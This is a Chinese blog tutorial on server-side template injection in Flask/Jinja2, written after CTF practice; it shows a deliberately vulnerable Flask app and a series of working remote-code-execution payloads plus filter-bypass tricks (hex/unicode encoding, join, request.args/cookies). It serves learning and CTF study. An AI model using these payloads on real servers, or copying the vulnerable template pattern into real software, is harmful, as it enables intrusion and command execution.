

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="ocean">
  <meta name="keywords" content="">
  
    <meta name="description" content="python ssti的学习(以flask为例)起因最近因为参加了newstar的新生赛，从第三周到第五周都有python ssti的题目，所以就简单的学习了一下ssti flask入门参考flask官方文档 Flask 是一个 Python 实现的 Web 开发微框架，是一个使用Python编写的轻量级web应用框架，其WSGI工具箱采用Werkzeug，模板引擎则使用Jinja2。更多开发细节">
<meta property="og:type" content="article">
<meta property="og:title" content="ssti入门">
<meta property="og:url" content="https://zoceanyq.github.io/2022/10/18/ssti%E5%85%A5%E9%97%A8/index.html">
<meta property="og:site_name" content="oceanのblog">
<meta property="og:description" content="python ssti的学习(以flask为例)起因最近因为参加了newstar的新生赛，从第三周到第五周都有python ssti的题目，所以就简单的学习了一下ssti flask入门参考flask官方文档 Flask 是一个 Python 实现的 Web 开发微框架，是一个使用Python编写的轻量级web应用框架，其WSGI工具箱采用Werkzeug，模板引擎则使用Jinja2。更多开发细节">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://zoceanyq.github.io/2022/10/18/ssti%E5%85%A5%E9%97%A8/image-20221018170230556.png">
<meta property="og:image" content="https://zoceanyq.github.io/2022/10/18/ssti%E5%85%A5%E9%97%A8/image-20221018171137574.png">
<meta property="og:image" content="https://zoceanyq.github.io/2022/10/18/ssti%E5%85%A5%E9%97%A8/image-20221018171310379.png">
<meta property="og:image" content="https://zoceanyq.github.io/2022/10/18/ssti%E5%85%A5%E9%97%A8/image-20221018171549408.png">
<meta property="og:image" content="https://zoceanyq.github.io/2022/10/18/ssti%E5%85%A5%E9%97%A8/image-20221018171804596.png">
<meta property="og:image" content="https://zoceanyq.github.io/2022/10/18/ssti%E5%85%A5%E9%97%A8/image-20221018172814768.png">
<meta property="og:image" content="https://zoceanyq.github.io/2022/10/18/ssti%E5%85%A5%E9%97%A8/image-20221018173411167.png">
<meta property="og:image" content="https://zoceanyq.github.io/2022/10/18/ssti%E5%85%A5%E9%97%A8/image-20221018184827820.png">
<meta property="og:image" content="https://zoceanyq.github.io/2022/10/18/ssti%E5%85%A5%E9%97%A8/image-20221018185833149.png">
<meta property="article:published_time" content="2022-10-18T11:47:13.000Z">
<meta property="article:modified_time" content="2022-10-18T12:45:24.010Z">
<meta property="article:author" content="ocean">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://zoceanyq.github.io/2022/10/18/ssti%E5%85%A5%E9%97%A8/image-20221018170230556.png">
  
  
  
  <title>ssti入门 - oceanのblog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"zoceanyq.github.io","root":"/","version":"1.9.3","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":"la7veLCULlDKhE4hpsj6mJni-gzGzoHsz","app_key":"cCsi0MQnXgUVyfA3ZBM7T7zR","server_url":"https://la7velcu.lc-cn-n1-shared.com","path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  

  

  

  

  

  

  
    
  



  
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>oceanのblog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="ssti入门"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2022-10-18 19:47" pubdate>
          2022年10月18日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          4.5k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          38 分钟
        
      </span>
    

    
    
      
        <span id="leancloud-page-views-container" class="post-meta" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="leancloud-page-views"></span> 次
        </span>
        
      
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">ssti入门</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="python-ssti的学习-以flask为例"><a href="#python-ssti的学习-以flask为例" class="headerlink" title="python ssti的学习(以flask为例)"></a>python ssti的学习(以flask为例)</h1><h2 id="起因"><a href="#起因" class="headerlink" title="起因"></a>起因</h2><p>最近因为参加了newstar的新生赛，从第三周到第五周都有python ssti的题目，所以就简单的学习了一下ssti</p>
<h2 id="flask入门"><a href="#flask入门" class="headerlink" title="flask入门"></a>flask入门</h2><p>参考<a target="_blank" rel="noopener" href="http://docs.jinkan.org/docs/flask/">flask官方文档</a></p>
<p>Flask 是一个 Python 实现的 Web 开发微框架，是一个使用Python编写的轻量级web应用框架，其WSGI工具箱采用Werkzeug，模板引擎则使用Jinja2。更多开发细节可以参考上面的flask中文文档。</p>
<h2 id="ssti入门"><a href="#ssti入门" class="headerlink" title="ssti入门"></a>ssti入门</h2><p>SSTI 即服务端模板注入攻击(Server-Side Template Injection)，服务端接受用户输入，将其作为 Web 应用模板的一部分，渲染编译后执行了恶意内容，导致敏感信息泄露、代码执行等。</p>
<h3 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h3><p>ssti服务端模板注入，ssti主要为python的一些框架 jinja2、mako、tornado、django，PHP框架smarty twig，java框架jade 、velocity等等使用了渲染函数时，由于代码不规范或信任了用户输入而导致了服务端模板注入，模板渲染其实并没有漏洞，主要是程序员对代码不规范不严谨造成了模板注入漏洞，造成模板可控。本文着重对flask模板注入进行浅析。</p>
<h3 id="模板引擎"><a href="#模板引擎" class="headerlink" title="模板引擎"></a>模板引擎</h3><p>模板引擎可以让（网站）程序实现界面与数据分离，业务代码与逻辑代码的分离，这大大提升了开发效率，良好的设计也使得代码重用变得更加容易。但是往往新的开发都会导致一些安全问题，虽然模板引擎会提供沙箱机制（相当于一个白名单，你只能用这个白名单里面的东西），但同样存在沙箱逃逸技术来绕过。<br>模板只是一种提供给程序来解析的一种语法，换句话说，模板是用于从数据（变量）到实际的视觉表现（HTML代码）这项工作的一种实现手段，而这种手段不论在前端还是后端都有应用。<br>通俗来说，利用模板引擎来生成前端的html代码，模板引擎会提供一套生成html代码的程序，然后只需要获取用户的数据，然后放到渲染函数里，然后生成模板+用户数据的前端html页面，然后反馈给浏览器，呈现在用户面前。</p>
<h3 id="实例"><a href="#实例" class="headerlink" title="实例"></a>实例</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment">#python3</span><br><span class="hljs-comment">#Flask version:1.11.1</span><br><span class="hljs-comment">#Jinja2: 2.10</span><br><span class="hljs-keyword">from</span> flask <span class="hljs-keyword">import</span> Flask, request<br><span class="hljs-keyword">from</span> jinja2 <span class="hljs-keyword">import</span> Template<br>app = Flask(__name__)<br><span class="hljs-meta">@app.route(<span class="hljs-params"><span class="hljs-string">&quot;/&quot;</span></span>)</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">index</span>():<br>    name = request.args.get(<span class="hljs-string">&#x27;name&#x27;</span>, <span class="hljs-string">&#x27;guest&#x27;</span>)<br>    t = Template(<span class="hljs-string">&quot;Hello &quot;</span> + name)<br>    <span class="hljs-keyword">return</span> t.render()<br><span class="hljs-keyword">if</span> __name__ == <span class="hljs-string">&quot;__main__&quot;</span>:<br>    app.run();<br></code></pre></td></tr></table></figure>

<p>可以看到源代码这里直接将get方法的name变量输出了，由于前端是由jinja进行模板渲染的而在jinja中由{{}}包裹的会被当做变量输出，所以当我们输入{{7*7}}时就会输出49</p>
<img src="/2022/10/18/ssti%E5%85%A5%E9%97%A8/image-20221018170230556.png" srcset="/img/loading.gif" lazyload class="">

<h3 id="ssti前置知识"><a href="#ssti前置知识" class="headerlink" title="ssti前置知识"></a>ssti前置知识</h3><p>在学习SSTI注入之前，我们首先需要了解一些python的魔术方法和内置类</p>
<h5 id="class"><a href="#class" class="headerlink" title="class"></a><strong>class</strong></h5><p><code>__class__</code>用于返回该对象所属的类</p>
<img src="/2022/10/18/ssti%E5%85%A5%E9%97%A8/image-20221018171137574.png" srcset="/img/loading.gif" lazyload class="">

<h4 id="base"><a href="#base" class="headerlink" title="base"></a><strong>base</strong></h4><p><code>__base__</code>用于获取类的基类（也称父类）</p>
<img src="/2022/10/18/ssti%E5%85%A5%E9%97%A8/image-20221018171310379.png" srcset="/img/loading.gif" lazyload class="">

<h3 id="mro"><a href="#mro" class="headerlink" title="mro"></a><strong>mro</strong></h3><p><code>__mro__</code>返回解析方法调用的顺序。（当调用_mro_[1]或者-1时作用其实等同于_base_)</p>
<img src="/2022/10/18/ssti%E5%85%A5%E9%97%A8/image-20221018171549408.png" srcset="/img/loading.gif" lazyload class="">

<h4 id="subclasses"><a href="#subclasses" class="headerlink" title="subclasses()"></a><strong>subclasses</strong>()</h4><p><code>__subclasses__()</code>可以获取类的所有子类</p>
<img src="/2022/10/18/ssti%E5%85%A5%E9%97%A8/image-20221018171804596.png" srcset="/img/loading.gif" lazyload class="">

<h4 id="常用过滤器"><a href="#常用过滤器" class="headerlink" title="常用过滤器"></a>常用过滤器</h4><p><a target="_blank" rel="noopener" href="https://jinja.palletsprojects.com/en/3.0.x/templates/#filters">参考官方文档</a></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">1，过滤器通过管道符号（|）与变量连接,并且在括号中可能有可选的参数<br>2，可以链接到多个过滤器.一个滤波器的输出将应用于下一个过滤器.<br></code></pre></td></tr></table></figure>

<p>其实就是可以实现一些简单的功能，比如attr()过滤器可以实现代替<code>.</code>，join()可以将字符串进行拼接，reverse可以将字符串反置等等</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><code class="hljs python">length() <span class="hljs-comment"># 获取一个序列或者字典的长度并将其返回</span><br><br><span class="hljs-built_in">int</span>()：<span class="hljs-comment"># 将值转换为int类型；</span><br><br><span class="hljs-built_in">float</span>()：<span class="hljs-comment"># 将值转换为float类型；</span><br><br>lower()：<span class="hljs-comment"># 将字符串转换为小写；</span><br><br>upper()：<span class="hljs-comment"># 将字符串转换为大写；</span><br><br>reverse()：<span class="hljs-comment"># 反转字符串；</span><br><br>replace(value,old,new)： <span class="hljs-comment"># 将value中的old替换为new</span><br><br><span class="hljs-built_in">list</span>()：<span class="hljs-comment"># 将变量转换为列表类型；</span><br><br>string()：<span class="hljs-comment"># 将变量转换成字符串类型；</span><br><br>join()：<span class="hljs-comment"># 将一个序列中的参数值拼接成字符串,通常有python内置的dict()配合使用</span><br><br>attr(): <span class="hljs-comment"># 获取对象的属性</span><br></code></pre></td></tr></table></figure>

<h2 id="ssti语句构造"><a href="#ssti语句构造" class="headerlink" title="ssti语句构造"></a>ssti语句构造</h2><p>前面讲了这么多，终于可以开始了</p>
<p>首先我们需要拿到当前类，也就是使用**””._<em>class</em>_**</p>
<img src="/2022/10/18/ssti%E5%85%A5%E9%97%A8/image-20221018172814768.png" srcset="/img/loading.gif" lazyload class="">

<p>第二步拿到基类，也就是使用_<em>base</em>__获得，也可以使用__mro__获得（我学的时候就是因为不知道为什么一会用base一会用mro就觉得很烦躁…….）</p>
<img src="/2022/10/18/ssti%E5%85%A5%E9%97%A8/image-20221018173411167.png" srcset="/img/loading.gif" lazyload class="">

<p>第三步，拿到基类的子类，用<code>__subclasses__()</code>，拿到子类过后我们就可以寻找可以用于执行命令或者读取文件的类，大多数利用的是<code>os._wrap_close</code>这个类</p>
<p>接下来就可以利用<code>os。_wrap_close</code>，这个类中有<code>popen</code>方法，我们去调用它<br>首先<br>先调用它的__init__方法进行初始化类</p>
<img src="/2022/10/18/ssti%E5%85%A5%E9%97%A8/image-20221018184827820.png" srcset="/img/loading.gif" lazyload class="">

<p>然后调用globals获取到方法内以字典的形式返回的方法，属性等</p>
<img src="/2022/10/18/ssti%E5%85%A5%E9%97%A8/image-20221018185833149.png" srcset="/img/loading.gif" lazyload class="">

<p>到这一步就可以rce了</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python">name=&#123;&#123;<span class="hljs-string">&quot;&quot;</span>.__class__.__bases__[<span class="hljs-number">0</span>]. __subclasses__()[<span class="hljs-number">138</span>].__init__.__globals__[<span class="hljs-string">&#x27;popen&#x27;</span>](<span class="hljs-string">&#x27;dir&#x27;</span>).read()&#125;&#125;<br></code></pre></td></tr></table></figure>

<p>还有一个比较厉害的模块，就是<code>__builtins__</code>,它里面有<code>eval()</code>等函数，我们可以也利用它来进行RCE<br>它的payload是</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python">&#123;&#123;url_for.__globals__[<span class="hljs-string">&#x27;__builtins__&#x27;</span>][<span class="hljs-string">&#x27;eval&#x27;</span>](<span class="hljs-string">&quot;__import__(&#x27;os&#x27;).popen(&#x27;dir&#x27;).read()&quot;</span>)&#125;&#125;<br></code></pre></td></tr></table></figure>

<h2 id="常见的绕过"><a href="#常见的绕过" class="headerlink" title="常见的绕过"></a>常见的绕过</h2><p>当然前面讲的只是在没有任何过滤的情况下payload才这样写，在平时做题的时候或多或少都会有一些过滤</p>
<h3 id="被过滤"><a href="#被过滤" class="headerlink" title=".被过滤"></a>.被过滤</h3><p>当.被过滤后意味着我们就不能使用.__class了</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python">&#123;&#123;<span class="hljs-string">&quot;&quot;</span>.__class__&#125;&#125;=&#123;&#123;<span class="hljs-string">&quot;&quot;</span>[<span class="hljs-string">&#x27;__class__&#x27;</span>]&#125;&#125;<br></code></pre></td></tr></table></figure>

<p>我们就可以这样来绕过.</p>
<h3 id="被过滤-1"><a href="#被过滤-1" class="headerlink" title="_被过滤"></a>_被过滤</h3><p>当_被过滤时，有以下几种方法绕过</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-number">1</span>、通过<span class="hljs-built_in">list</span>获取字符列表，然后用pop来获取_，举个例子<br>&#123;% <span class="hljs-built_in">set</span> a=(()|select|string|<span class="hljs-built_in">list</span>).pop(<span class="hljs-number">24</span>)%&#125;&#123;%<span class="hljs-built_in">print</span>(a)%&#125;<br><span class="hljs-number">2</span>、可以通过十六进制，或者Unicode编码的方式进行绕过这个方法也通常用来绕过关键字绕过，举个例子<br>&#123;&#123;()[<span class="hljs-string">&quot;\x5f\x5fclass\x5f\x5f&quot;</span>]&#125;&#125; =&#123;&#123;().__class__&#125;&#125;<br></code></pre></td></tr></table></figure>

<h3 id="绕过"><a href="#绕过" class="headerlink" title="绕过[]"></a>绕过[]</h3><p>这种情况我还没遇见过，就参考的大佬的文章</p>
<p>这个时候可以使用<code>__getitem__</code> 魔术方法，它的作用简单说就是可以把中括号转换为括号的形式，举个例子</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python">__bases__[<span class="hljs-number">0</span>]=__bases__.__getitem__(<span class="hljs-number">0</span>)<br></code></pre></td></tr></table></figure>

<h3 id="绕过-1"><a href="#绕过-1" class="headerlink" title="绕过"></a>绕过{{}}</h3><p>有时候为了防止SSTI，可能程序员会ban掉{ {} }，这个时候我们可以利用jinja2的语法，用{ %%}来进行RCE，举个例子<br>我们平常使用的payload</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python">&#123;&#123;<span class="hljs-string">&quot;&quot;</span>.__class__.__bases__[<span class="hljs-number">0</span>]. __subclasses__()[<span class="hljs-number">138</span>].__init__.__globals__[<span class="hljs-string">&#x27;popen&#x27;</span>](<span class="hljs-string">&#x27;dir&#x27;</span>).read()&#125;&#125;=&#123;%<span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;&quot;</span>.__class__.__bases__[<span class="hljs-number">0</span>]. __subclasses__()[<span class="hljs-number">138</span>].__init__.__globals__[<span class="hljs-string">&#x27;popen&#x27;</span>](<span class="hljs-string">&#x27;dir&#x27;</span>).read())%&#125;<br></code></pre></td></tr></table></figure>

<p>也可以借助for循环和if语句来执行命令</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python">&#123;%<span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-string">&#x27;&#x27;</span>.__class__.__base__.__subclasses__()%&#125;&#123;%<span class="hljs-keyword">if</span> i.__name__ ==<span class="hljs-string">&#x27;_wrap_close&#x27;</span>%&#125;&#123;%<span class="hljs-built_in">print</span> i.__init__.__globals__[<span class="hljs-string">&#x27;popen&#x27;</span>](<span class="hljs-string">&#x27;dir&#x27;</span>).read()%&#125;&#123;%endif%&#125;&#123;%endfor%&#125;<br></code></pre></td></tr></table></figure>

<h3 id="绕过单双引号"><a href="#绕过单双引号" class="headerlink" title="绕过单双引号"></a>绕过单双引号</h3><p>当单引号和双引号被ban时，我们通常采用<code>request.args.a</code>，然后给a赋值这种方式来进行绕过，举个例子</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python">&#123;&#123;url_for.__globals__[request.args.a]&#125;&#125;&amp;a=__builtins__  等同于 &#123;&#123;url_for.__globals__[<span class="hljs-string">&#x27;__builtins__&#x27;</span>]&#125;&#125;<br></code></pre></td></tr></table></figure>

<h3 id="绕过args"><a href="#绕过args" class="headerlink" title="绕过args"></a>绕过args</h3><p>当使用args的方法绕过<code>&#39;</code>和<code>&quot;</code>时，可能遇见args被ban的情况，这个时候可以采用<code>request.cookies</code>和<code>request.values</code>，他们利用的方式大同小异，示例如下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs python">GET:&#123;&#123;url_for.__globals__[request.cookies.a]&#125;&#125;<br>COOkie: <span class="hljs-string">&quot;a&quot;</span> :<span class="hljs-string">&#x27;__builtins__&#x27;</span><br></code></pre></td></tr></table></figure>

<h3 id="注"><a href="#注" class="headerlink" title="注:"></a>注:</h3><p>如果只是过滤了单双引号的其中一个，那么就可以用另外一个来代替</p>
<h3 id="绕过数字"><a href="#绕过数字" class="headerlink" title="绕过数字"></a>绕过数字</h3><p>有时候可能会遇见数字<code>0-9</code>被ban的情况，这个时候我们可以通过count来得到数字，举个例子</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python">&#123;&#123;(<span class="hljs-built_in">dict</span>(e=a)|join|count)&#125;&#125;<br></code></pre></td></tr></table></figure>

<p>绕过关键字</p>
<p>有时候可能遇见<code>class</code>、<code>base</code>这种关键词被绕过的情况，我们这个时候通常使用的绕过方式是使用join拼接从而实现绕过，举个例子</p>
<figure class="highlight handlebars"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs handlebars"><span class="hljs-template-variable">&#123;&#123;<span class="hljs-name">dict</span>(<span class="hljs-name">__in</span>=a,<span class="hljs-attr">it__</span>=a)|join&#125;&#125;</span><span class="language-xml">  =__init__</span><br></code></pre></td></tr></table></figure>

<p>关键字绕过还可以用16进制和unicode编码进行绕过</p>
<h2 id="参考链接"><a href="#参考链接" class="headerlink" title="参考链接"></a><a target="_blank" rel="noopener" href="https://tttang.com/archive/1698/#toc_class">参考链接</a></h2>
                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/python/" class="category-chain-item">python</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>ssti入门</div>
      <div>https://zoceanyq.github.io/2022/10/18/ssti入门/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>ocean</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2022年10月18日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2022/10/24/php%E4%BC%AA%E9%9A%8F%E6%9C%BA%E6%95%B0/" title="php伪随机数">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">php伪随机数</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2022/10/16/thinkphp5-0-24%E7%9A%84%E5%AD%A6%E4%B9%A0/" title="thinkphp5.0.24的学习">
                        <span class="hidden-mobile">thinkphp5.0.24的学习</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  <article id="comments" lazyload>
    
  <div id="valine"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#valine', function() {
      Fluid.utils.createScript('https://lib.baomitu.com/valine/1.5.1/Valine.min.js', function() {
        var options = Object.assign(
          {"appId":"la7veLCULlDKhE4hpsj6mJni-gzGzoHsz","appKey":"cCsi0MQnXgUVyfA3ZBM7T7zR","path":"window.location.pathname","placeholder":null,"avatar":"retro","meta":["nick","mail","link"],"requiredFields":[],"pageSize":10,"lang":"zh-CN","highlight":false,"recordIP":false,"serverURLs":"","emojiCDN":null,"emojiMaps":null,"enableQQ":false},
          {
            el: "#valine",
            path: window.location.pathname
          }
        )
        new Valine(options);
        Fluid.utils.waitElementVisible('#valine .vcontent', () => {
          var imgSelector = '#valine .vcontent img:not(.vemoji)';
          Fluid.plugins.imageCaption(imgSelector);
          Fluid.plugins.fancyBox(imgSelector);
        })
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


  </article>


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://www.google.com/" target="_blank" rel="nofollow noopener"><span>Google</span></a> <i class="iconfont icon-love"></i> <a href="https://zoceanyq.github.io/" target="_blank" rel="nofollow noopener"><span>Blog</span></a> 
    </div>
  
  
    <div class="statistics">
  
  

  
    
      <span id="leancloud-site-pv-container" style="display: none">
        总访问量 
        <span id="leancloud-site-pv"></span>
         次
      </span>
    
    
      <span id="leancloud-site-uv-container" style="display: none">
        总访客数 
        <span id="leancloud-site-uv"></span>
         人
      </span>
    
    

  
</div>

  
  
